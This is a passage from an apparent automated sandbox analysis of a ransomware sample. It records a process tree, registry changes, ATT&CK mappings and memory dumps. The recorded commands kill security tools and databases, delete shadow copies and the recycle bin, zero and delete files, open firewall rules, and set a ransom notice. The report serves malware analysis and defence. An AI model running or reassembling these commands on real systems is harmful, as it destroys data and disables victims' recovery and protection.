PID 2732 wrote to memory of 3536	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	106
PID 2732 wrote to memory of 3536	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	106
PID 2732 wrote to memory of 3812	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	108
PID 2732 wrote to memory of 3812	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	108
PID 2732 wrote to memory of 3812	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	108
PID 2732 wrote to memory of 3152	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	110
PID 2732 wrote to memory of 3152	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	110
PID 2732 wrote to memory of 3152	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	110
PID 2732 wrote to memory of 3572	2732	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe	112

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files are secured, please read the text note located in your desktop..."	c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe

C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
"C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2732
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:3960
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3760
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:516
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:3240
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2656
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:2832
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:3688
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:380
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:716
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:3192
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:652
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4004
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3536
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3812
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3152
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3572
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3884
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3300
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3228
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2380
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3500
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1016
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1272
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3720
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2524
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2368
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2584
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3692
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1884
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3188
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2408
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2840
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2772
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3484
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1316
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1340
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3808
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3792
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  - Drops file in Windows directory
  PID:1948
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4052
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1248
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1532
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:3208
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:2388
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1936
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:2476
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:744
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c03354d95bf66aa1f87a9889bdca3b87819a06a8bd49a69153e3fd4138a4a34c.exe
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:968

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2732-115-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2732-210-0x000000000CBC0000-0x000000000CBC1000-memory.dmp

Filesize
4KB

Download
memory/2732-211-0x00000000069A0000-0x00000000069A1000-memory.dmp

Filesize
4KB

Download
memory/2732-117-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/2732-123-0x0000000005190000-0x0000000005191000-memory.dmp

Filesize
4KB

Download
memory/2732-118-0x00000000049A0000-0x00000000049A1000-memory.dmp

Filesize
4KB

Download
memory/3904-187-0x0000000000C40000-0x0000000000C41000-memory.dmp

Filesize
4KB

Download
memory/3904-205-0x0000000004383000-0x0000000004384000-memory.dmp

Filesize
4KB

Download
memory/3904-184-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

Filesize
4KB

Download
memory/3904-186-0x0000000004382000-0x0000000004383000-memory.dmp

Filesize
4KB

Download
memory/3904-185-0x0000000004380000-0x0000000004381000-memory.dmp

Filesize
4KB

Download
memory/3904-190-0x00000000073E0000-0x00000000073E1000-memory.dmp

Filesize
4KB

Download
memory/3904-191-0x0000000006970000-0x0000000006971000-memory.dmp

Filesize
4KB

Download
memory/3904-192-0x0000000007E40000-0x0000000007E41000-memory.dmp

Filesize
4KB

Download
memory/3904-193-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/3904-194-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3904-204-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3904-206-0x0000000004384000-0x0000000004386000-memory.dmp

Filesize
8KB

Download
memory/3904-182-0x0000000006740000-0x0000000006741000-memory.dmp

Filesize
4KB

Download
memory/3904-180-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/3904-181-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download